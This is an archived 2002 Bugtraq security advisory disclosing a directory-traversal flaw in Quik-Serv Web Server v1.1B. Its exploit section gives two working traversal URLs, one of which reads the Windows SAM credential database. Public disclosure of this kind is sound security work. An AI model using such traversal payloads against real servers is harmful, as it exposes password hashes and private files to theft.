[24955] in bugtraq
Quik-Serv Web Server v1.1B Arbitrary File Disclosure
daemon@ATHENA.MIT.EDU (a b)
Wed Apr 3 21:31:46 2002
From: "a b" <p0pt4rtz@hotmail.com>
To: bugtraq@securityfocus.com
Date: Wed, 03 Apr 2002 13:20:44 -0800
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F165rSByh133tYwlib4000002c0@hotmail.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Quik-Serv Web Server v1.1B Arbitrary File Disclosure
Abstract:
Quik-Serv Web Server is a small webserver with CGI implemented into
it. The server is vulnerable to a directory transversal which allows
a remote user to display arbitrary files.
Exploit:
To display the SAM database
http://server/../../../winnt/repair/sam
To display the win.ini file
http://server/../../../winnt/win.ini
Workaround:
Install packet filtering systems, wait for a fix, or don't even use
the product.
Vendor Status:
The vendor has been contacted. But received no reply.
- - - - - --
p0p t4rtz
p0pt4rtz@hotmail.com
NetCra$h Security Research Team
http://www26.brinkster.com/netcrash/
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPKtxlnZQKziJjiRfEQJ5tACgx8vvxarS1zSVcWTYIvmLlQRtNi4AoNiU
xJfaNBOzgvm5Z+F582bJ9LJr
=hCYD
-----END PGP SIGNATURE-----
_________________________________________________________________
MSN Photos is the easiest way to share and print your photos:
http://photos.msn.com/support/worldwide.aspx
